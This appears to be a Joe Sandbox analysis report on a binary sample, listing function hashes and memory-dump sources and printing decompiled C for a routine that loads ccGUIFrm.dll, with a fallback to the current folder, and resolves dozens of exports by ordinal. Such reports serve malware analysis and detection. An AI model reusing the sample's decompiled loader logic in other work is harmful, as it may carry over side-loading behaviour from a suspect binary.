                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                              • Instruction ID: a276d0c705cabb6abd757d29c0492e234ae58945ace5a9ab56863a52737eb262
                                                                                                                              • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                              • Instruction Fuzzy Hash: FDD17B73E0F9F34A8735816E645823FEA626FD169036EC7E68CD03F389D92A5D1091D4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00428200 Relevance: .4, Instructions: 378COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                              • Instruction ID: fe8c877fcd040efa0c731ba085507a984665dbdd2ef43889e3a7ec5088528dfa
                                                                                                                              • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                              • Instruction Fuzzy Hash: 30D19F73E0F9B34A8736816E605823FEA626FD1B9036EC7E68CD43F389D52A5D1085D4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00427DF4 Relevance: .4, Instructions: 361COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                              • Instruction ID: 674b3f08e63661450d13d98e8ef24761410e9d755bebc79435650ec32cd8ed6b
                                                                                                                              • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                              • Instruction Fuzzy Hash: BCC19B73E0E9B34A8736816E606823FEA626FD179035FC7E2CCD03F389962A5D1585D4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00427A20 Relevance: .4, Instructions: 351COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                              • Instruction ID: cdd7bbc158e73d37cd430895207f04e94b0ff6a78591373edb06e018aa37b53c
                                                                                                                              • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                              • Instruction Fuzzy Hash: 71C19D73E1E9B34A8736816E605813FEE626FD179436EC7E28C903F389D62A5E1091D4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402C50 Relevance: .3, Instructions: 292COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fd38afbdaaff75bfd639250d0d2abeee2b0ad55ba80d9f0fa13b81947ad4660c
                                                                                                                              • Instruction ID: 37ca108f5185dd16cedf77c942ff7071f8359301b49faa770c3c6e3303812527
                                                                                                                              • Opcode Fuzzy Hash: fd38afbdaaff75bfd639250d0d2abeee2b0ad55ba80d9f0fa13b81947ad4660c
                                                                                                                              • Instruction Fuzzy Hash: 96A184B1B002059FDB18DF6DCD85AAEBBB5EB84314F14853EE406E7391EA74A901CB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040ACB0 Relevance: .3, Instructions: 266COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e31cf57cfe67ffd27bf9790469e290a8639170628c3d89a26d81e91722d0dc37
                                                                                                                              • Instruction ID: d5473c3579fe8263cb6a601cac7e3232d1d1ef0a13140b0d8f0105d240f74e41
                                                                                                                              • Opcode Fuzzy Hash: e31cf57cfe67ffd27bf9790469e290a8639170628c3d89a26d81e91722d0dc37
                                                                                                                              • Instruction Fuzzy Hash: 7881C372B006069FC718DE6DDD81AAB77E6EFC8300B14C53EF906D7785EA38E8118695
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009602A0 Relevance: .2, Instructions: 243COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 64b782d0c79984a9a580b271dab16ad482ba6587b325cb453f36c1734913797f
                                                                                                                              • Instruction ID: e9996f02963277971ced6b18d106877d47839d9e8f4293ac280436a539d65d17
                                                                                                                              • Opcode Fuzzy Hash: 64b782d0c79984a9a580b271dab16ad482ba6587b325cb453f36c1734913797f
                                                                                                                              • Instruction Fuzzy Hash: F1714C7FF65A114B93008A39CC8119ABBD39BC9331B1FD269CCA8873A5C979DC078780
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403880 Relevance: .2, Instructions: 229COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c1fcc76b6605a0982e5286b1255927be5d6d79645c5d8522a2c37351a403c7b7
                                                                                                                              • Instruction ID: ed2bdc0458ed401ce7733e307f9a3b8c379de38ab25a2bcea0d5e25bf8581e0e
                                                                                                                              • Opcode Fuzzy Hash: c1fcc76b6605a0982e5286b1255927be5d6d79645c5d8522a2c37351a403c7b7
                                                                                                                              • Instruction Fuzzy Hash: 4181F5726083018FC714DF29C98156BBBE5AF84315F450A3EF886A7391D778FA45CB86
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00419970 Relevance: .1, Instructions: 106COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7087ffa77b0e8421d5a4f8942196dd772454d11a8cbd9fcbe53308187e33cbda
                                                                                                                              • Instruction ID: 44d28aaa5b48fc5bb914ce06392c96fd2467a31c164a45c3361776d31ce92611
                                                                                                                              • Opcode Fuzzy Hash: 7087ffa77b0e8421d5a4f8942196dd772454d11a8cbd9fcbe53308187e33cbda
                                                                                                                              • Instruction Fuzzy Hash: 97318072B041684BE668AB69D5273EA73D0EB94750F89442FEA4DC7390D93EEC4483C7
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041BEB0 Relevance: .1, Instructions: 76COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                              • Instruction ID: 630a341d14c3cd43428ff83339a56fb4d926aa791a86ec94c53f2ab13ff7710c
                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                              • Instruction Fuzzy Hash: 95110B7720014143D614CA2ECDB45F7A796EBC532172C42ABD141CB754D32AE5C79D88
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009761BA Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8162c6996de6321d22cebdfacb438f502ff6032f1b4aedd24430f21ebbbf6f47
                                                                                                                              • Instruction ID: f4f2446ddcfa9ef5e0a9848fa2b65138b63b475fbc2172ca27a9f475679afb73
                                                                                                                              • Opcode Fuzzy Hash: 8162c6996de6321d22cebdfacb438f502ff6032f1b4aedd24430f21ebbbf6f47
                                                                                                                              • Instruction Fuzzy Hash: E9E04672A19228EBCB14DB98D948A8AB2ECEB84F41B918096F505E3202C270DE00C7D0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00418450 Relevance: 84.3, APIs: 46, Strings: 2, Instructions: 338libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 74%
                                                                                                                              			E00418450(intOrPtr* __ecx, void* __ebp, signed int _a4) {
				void* _v12;
				signed int _v16;
				intOrPtr _v20;
				short _v24;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void* _v45;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t125;
				signed int _t127;
				signed int _t130;
				char _t134;
				char* _t137;
				char* _t139;
				struct HINSTANCE__* _t140;
				_Unknown_base(*)()* _t204;
				char* _t207;
				signed int _t208;
				CHAR* _t213;
				void* _t214;
				void* _t216;
				signed int _t256;
				void* _t257;
				intOrPtr* _t259;
				void* _t260;
				void* _t264;
				signed int _t265;

				_push(0xffffffff);
				_push(E00431428);
				_push( *[fs:0x0]);
				_t265 = _t264 - 0x24;
				_t125 =  *0x43a6a8; // 0x2a5cd135
				_v16 = _t125 ^ _t265;
				_t127 =  *0x43a6a8; // 0x2a5cd135
				_push(_t127 ^ _t265);
				 *[fs:0x0] =  &_v12;
				_t256 = _a4;
				_t259 = __ecx;
				_v45 = 0;
				if( *((intOrPtr*)(__ecx + 0xb8)) != 0) {
					E00404030(__ecx);
				}
				_t130 = _t256;
				_v20 = 7;
				_v24 = 0;
				_v40 = 0;
				_t240 =  &(2[_t130]);
				do {
					_t216 =  *_t130;
					_t130 =  &(2[_t130]);
				} while (_t216 != 0);
				E00401D80(0,  &_v44, _t256, _t130 - _t240 >> 1);
				_t134 = _v32;
				_v12 = 0;
				if(_t134 <= 0) {
					L11:
					_push(1);
					_push("\\");
					E004082A0( &_v44);
				} else {
					_t256 = _t134 - 1;
					if(_t256 > _t134) {
						E0041AD33();
					}
					_t207 = _v40;
					if(_v20 < 8) {
						_t207 =  &_v40;
					}
					_t208 =  *(_t207 + _t256 * 2) & 0x0000ffff;
					if(_t208 != 0x5c && _t208 != 0x2f) {
						goto L11;
					}
				}
				_push(0xc);
				_push(L"ccGUIFrm.dll");
				E004082A0( &_v40);
				_t137 = _v44;
				if(_v24 < 8) {
					_t137 =  &_v32;
				}
				_push(_t137);
				if( *0x43ba68() == 0xffffffff) {
					E00401D80(0,  &_v40, L".\\ccGUIFrm.dll", 0xe);
				}
				_t139 = _v36;
				if(_v16 < 8) {
					_t139 =  &_v36;
				}
				_t140 =  *0x43ba8c(_t139);
				 *(_t259 + 0xb8) = _t140;
				if(_t140 == 0) {
					_t213 = _v45;
				} else {
					_t256 =  *0x43ba70;
					 *_t259 = GetProcAddress(_t140, 1);
					 *((intOrPtr*)(_t259 + 4)) = GetProcAddress( *(_t259 + 0xb8), 2);
					 *((intOrPtr*)(_t259 + 8)) = GetProcAddress( *(_t259 + 0xb8), 3);
					 *((intOrPtr*)(_t259 + 0xc)) = GetProcAddress( *(_t259 + 0xb8), 4);
					 *((intOrPtr*)(_t259 + 0x10)) = GetProcAddress( *(_t259 + 0xb8), 5);
					 *((intOrPtr*)(_t259 + 0x14)) = GetProcAddress( *(_t259 + 0xb8), 6);
					 *((intOrPtr*)(_t259 + 0x18)) = GetProcAddress( *(_t259 + 0xb8), 0x21);
					 *((intOrPtr*)(_t259 + 0x1c)) = GetProcAddress( *(_t259 + 0xb8), 8);
					 *((intOrPtr*)(_t259 + 0x20)) = GetProcAddress( *(_t259 + 0xb8), 9);
					 *((intOrPtr*)(_t259 + 0x24)) = GetProcAddress( *(_t259 + 0xb8), 0xa);
					 *((intOrPtr*)(_t259 + 0x2c)) = GetProcAddress( *(_t259 + 0xb8), 0xb);
					 *((intOrPtr*)(_t259 + 0x30)) = GetProcAddress( *(_t259 + 0xb8), 0xc);
					 *((intOrPtr*)(_t259 + 0x34)) = GetProcAddress( *(_t259 + 0xb8), 0x29);
					 *((intOrPtr*)(_t259 + 0x38)) = GetProcAddress( *(_t259 + 0xb8), 0x2a);
					 *((intOrPtr*)(_t259 + 0x3c)) = GetProcAddress( *(_t259 + 0xb8), 0xf);
					 *((intOrPtr*)(_t259 + 0x40)) = GetProcAddress( *(_t259 + 0xb8), 0x10);
					 *((intOrPtr*)(_t259 + 0x44)) = GetProcAddress( *(_t259 + 0xb8), 0x11);
					 *((intOrPtr*)(_t259 + 0x48)) = GetProcAddress( *(_t259 + 0xb8), 0x12);
					 *((intOrPtr*)(_t259 + 0x4c)) = GetProcAddress( *(_t259 + 0xb8), 0x13);
					 *((intOrPtr*)(_t259 + 0x50)) = GetProcAddress( *(_t259 + 0xb8), 0x14);
					 *((intOrPtr*)(_t259 + 0x54)) = GetProcAddress( *(_t259 + 0xb8), 0x15);
					 *((intOrPtr*)(_t259 + 0x68)) = GetProcAddress( *(_t259 + 0xb8), 0x16);
					 *((intOrPtr*)(_t259 + 0x6c)) = GetProcAddress( *(_t259 + 0xb8), 0x17);
					 *((intOrPtr*)(_t259 + 0x70)) = GetProcAddress( *(_t259 + 0xb8), 0x18);
					 *((intOrPtr*)(_t259 + 0x74)) = GetProcAddress( *(_t259 + 0xb8), 0x19);
					 *((intOrPtr*)(_t259 + 0x78)) = GetProcAddress( *(_t259 + 0xb8), 0x1a);
					 *((intOrPtr*)(_t259 + 0x28)) = GetProcAddress( *(_t259 + 0xb8), 0x1b);
					 *((intOrPtr*)(_t259 + 0x7c)) = GetProcAddress( *(_t259 + 0xb8), 0x1c);
					 *((intOrPtr*)(_t259 + 0x58)) = GetProcAddress( *(_t259 + 0xb8), 0x1d);
					 *((intOrPtr*)(_t259 + 0x5c)) = GetProcAddress( *(_t259 + 0xb8), 0x1e);
					 *((intOrPtr*)(_t259 + 0x60)) = GetProcAddress( *(_t259 + 0xb8), 0x1f);
					 *((intOrPtr*)(_t259 + 0x64)) = GetProcAddress( *(_t259 + 0xb8), 0x20);
					 *((intOrPtr*)(_t259 + 0x80)) = GetProcAddress( *(_t259 + 0xb8), 0x22);
					 *((intOrPtr*)(_t259 + 0x84)) = GetProcAddress( *(_t259 + 0xb8), 0x23);
					 *((intOrPtr*)(_t259 + 0x88)) = GetProcAddress( *(_t259 + 0xb8), 0x24);
					 *((intOrPtr*)(_t259 + 0x8c)) = GetProcAddress( *(_t259 + 0xb8), 0x25);
					 *((intOrPtr*)(_t259 + 0x90)) = GetProcAddress( *(_t259 + 0xb8), 0x26);
					 *((intOrPtr*)(_t259 + 0x94)) = GetProcAddress( *(_t259 + 0xb8), 0x27);
					 *((intOrPtr*)(_t259 + 0x98)) = GetProcAddress( *(_t259 + 0xb8), 0x28);
					 *((intOrPtr*)(_t259 + 0x9c)) = GetProcAddress( *(_t259 + 0xb8), 0x2b);
					 *((intOrPtr*)(_t259 + 0xa0)) = GetProcAddress( *(_t259 + 0xb8), 0x2c);
					 *((intOrPtr*)(_t259 + 0xa4)) = GetProcAddress( *(_t259 + 0xb8), 0x2d);
					 *((intOrPtr*)(_t259 + 0xa8)) = GetProcAddress( *(_t259 + 0xb8), 0x2e);
					 *((intOrPtr*)(_t259 + 0xac)) = GetProcAddress( *(_t259 + 0xb8), 0x2f);
					_t204 = GetProcAddress( *(_t259 + 0xb8), 0x30);
					_t240 =  *(_t259 + 0xb8);
					 *(_t259 + 0xb0) = _t204;
					 *((intOrPtr*)(_t259 + 0xb4)) = GetProcAddress( *(_t259 + 0xb8), 0x31);
					_t213 = 1;
				}
				_t278 = _v20 - 8;
				if(_v20 >= 8) {
					_push(_v40);
					L0041A97D(_t213, _t256, _t259, _t278);
					_t265 =  &(4[_t265]);
				}
				 *[fs:0x0] = _v12;
				_pop(_t257);
				_pop(_t260);
				_pop(_t214);
				return E0041B3F9(_t213, _t214, _v16 ^ _t265, _t240, _t257, _t260);
			}


































                                                                                                                              0x00418450
                                                                                                                              0x00418452
                                                                                                                              0x0041845d
                                                                                                                              0x0041845e
                                                                                                                              0x00418461
                                                                                                                              0x00418468
                                                                                                                              0x00418470
                                                                                                                              0x00418477
                                                                                                                              0x0041847c
                                                                                                                              0x00418482
                                                                                                                              0x00418488
                                                                                                                              0x00418490
                                                                                                                              0x00418494
                                                                                                                              0x00418496
                                                                                                                              0x00418496
                                                                                                                              0x0041849b
                                                                                                                              0x0041849d
                                                                                                                              0x004184a5
                                                                                                                              0x004184a9
                                                                                                                              0x004184ae
                                                                                                                              0x004184b1
                                                                                                                              0x004184b1
                                                                                                                              0x004184b4
                                                                                                                              0x004184b7
                                                                                                                              0x004184c6
                                                                                                                              0x004184cb
                                                                                                                              0x004184d1
                                                                                                                              0x004184da
                                                                                                                              0x00418506
                                                                                                                              0x00418506
                                                                                                                              0x00418508
                                                                                                                              0x00418511
                                                                                                                              0x004184dc
                                                                                                                              0x004184dc
                                                                                                                              0x004184e1
                                                                                                                              0x004184e3
                                                                                                                              0x004184e3
                                                                                                                              0x004184ec
                                                                                                                              0x004184f0
                                                                                                                              0x004184f2
                                                                                                                              0x004184f2
                                                                                                                              0x004184f6
                                                                                                                              0x004184fe
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004184fe
                                                                                                                              0x00418516
                                                                                                                              0x00418518
                                                                                                                              0x00418521
                                                                                                                              0x0041852a
                                                                                                                              0x0041852e
                                                                                                                              0x00418530
                                                                                                                              0x00418530
                                                                                                                              0x00418534
                                                                                                                              0x0041853e
                                                                                                                              0x0041854b
                                                                                                                              0x0041854b
                                                                                                                              0x00418554
                                                                                                                              0x00418558
                                                                                                                              0x0041855a
                                                                                                                              0x0041855a
                                                                                                                              0x0041855f
                                                                                                                              0x00418567
                                                                                                                              0x0041856d
                                                                                                                              0x00418823
                                                                                                                              0x00418573
                                                                                                                              0x00418573
                                                                                                                              0x0041857e
                                                                                                                              0x00418594
                                                                                                                              0x004185a2
                                                                                                                              0x004185a7
                                                                                                                              0x004185be
                                                                                                                              0x004185cc
                                                                                                                              0x004185d1
                                                                                                                              0x004185e7
                                                                                                                              0x004185f5
                                                                                                                              0x004185fa
                                                                                                                              0x00418611
                                                                                                                              0x0041861f
                                                                                                                              0x00418624
                                                                                                                              0x0041863b
                                                                                                                              0x00418649
                                                                                                                              0x0041864e
                                                                                                                              0x00418665
                                                                                                                              0x00418673
                                                                                                                              0x00418678
                                                                                                                              0x0041868f
                                                                                                                              0x0041869d
                                                                                                                              0x004186a2
                                                                                                                              0x004186b9
                                                                                                                              0x004186c7
                                                                                                                              0x004186cc
                                                                                                                              0x004186e3
                                                                                                                              0x004186f1
                                                                                                                              0x004186f6
                                                                                                                              0x0041870d
                                                                                                                              0x0041871b
                                                                                                                              0x00418720
                                                                                                                              0x00418734
                                                                                                                              0x00418745
                                                                                                                              0x0041874d
                                                                                                                              0x00418767
                                                                                                                              0x00418778
                                                                                                                              0x00418780
                                                                                                                              0x0041879a
                                                                                                                              0x004187ab
                                                                                                                              0x004187b3
                                                                                                                              0x004187cd
                                                                                                                              0x004187de
                                                                                                                              0x004187e6
                                                                                                                              0x00418800
                                                                                                                              0x00418806
                                                                                                                              0x00418808
                                                                                                                              0x00418811
                                                                                                                              0x00418819
                                                                                                                              0x0041881f
                                                                                                                              0x0041881f
                                                                                                                              0x00418827
                                                                                                                              0x0041882b
                                                                                                                              0x00418831
                                                                                                                              0x00418832
                                                                                                                              0x00418837
                                                                                                                              0x00418837
                                                                                                                              0x00418840
                                                                                                                              0x00418848
                                                                                                                              0x00418849
                                                                                                                              0x0041884b
                                                                                                                              0x0041885a

                                                                                                                              APIs
                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000001), ref: 0041857C
                                                                                                                              • GetProcAddress.KERNEL32(?,00000002), ref: 00418589
                                                                                                                              • GetProcAddress.KERNEL32(?,00000003), ref: 00418597
                                                                                                                              • GetProcAddress.KERNEL32(?,00000004), ref: 004185A5
                                                                                                                              • GetProcAddress.KERNEL32(?,00000005), ref: 004185B3
                                                                                                                              • GetProcAddress.KERNEL32(?,00000006), ref: 004185C1
                                                                                                                              • GetProcAddress.KERNEL32(?,00000021), ref: 004185CF
                                                                                                                              • GetProcAddress.KERNEL32(?,00000008), ref: 004185DC
                                                                                                                              • GetProcAddress.KERNEL32(?,00000009), ref: 004185EA
                                                                                                                              • GetProcAddress.KERNEL32(?,0000000A), ref: 004185F8
                                                                                                                              • GetProcAddress.KERNEL32(?,0000000B), ref: 00418606
                                                                                                                              • GetProcAddress.KERNEL32(?,0000000C), ref: 00418614
                                                                                                                              • GetProcAddress.KERNEL32(?,00000029), ref: 00418622
                                                                                                                              • GetProcAddress.KERNEL32(?,0000002A), ref: 00418630
                                                                                                                              • GetProcAddress.KERNEL32(?,0000000F), ref: 0041863E
                                                                                                                              • GetProcAddress.KERNEL32(?,00000010), ref: 0041864C
                                                                                                                              • GetProcAddress.KERNEL32(?,00000011), ref: 0041865A
                                                                                                                              • GetProcAddress.KERNEL32(?,00000012), ref: 00418668
                                                                                                                              • GetProcAddress.KERNEL32(?,00000013), ref: 00418676
                                                                                                                              • GetProcAddress.KERNEL32(?,00000014), ref: 00418684
                                                                                                                              • GetProcAddress.KERNEL32(?,00000015), ref: 00418692
                                                                                                                              • GetProcAddress.KERNEL32(?,00000016), ref: 004186A0
                                                                                                                              • GetProcAddress.KERNEL32(?,00000017), ref: 004186AE
                                                                                                                              • GetProcAddress.KERNEL32(?,00000018), ref: 004186BC
                                                                                                                              • GetProcAddress.KERNEL32(?,00000019), ref: 004186CA
                                                                                                                              • GetProcAddress.KERNEL32(?,0000001A), ref: 004186D8
                                                                                                                              • GetProcAddress.KERNEL32(?,0000001B), ref: 004186E6
                                                                                                                              • GetProcAddress.KERNEL32(?,0000001C), ref: 004186F4
                                                                                                                              • GetProcAddress.KERNEL32(?,0000001D), ref: 00418702
                                                                                                                              • GetProcAddress.KERNEL32(?,0000001E), ref: 00418710
                                                                                                                              • GetProcAddress.KERNEL32(?,0000001F), ref: 0041871E
                                                                                                                              • GetProcAddress.KERNEL32(?,00000020), ref: 0041872C
                                                                                                                              • GetProcAddress.KERNEL32(?,00000022), ref: 0041873A
                                                                                                                              • GetProcAddress.KERNEL32(?,00000023), ref: 0041874B
                                                                                                                              • GetProcAddress.KERNEL32(?,00000024), ref: 0041875C
                                                                                                                              • GetProcAddress.KERNEL32(?,00000025), ref: 0041876D
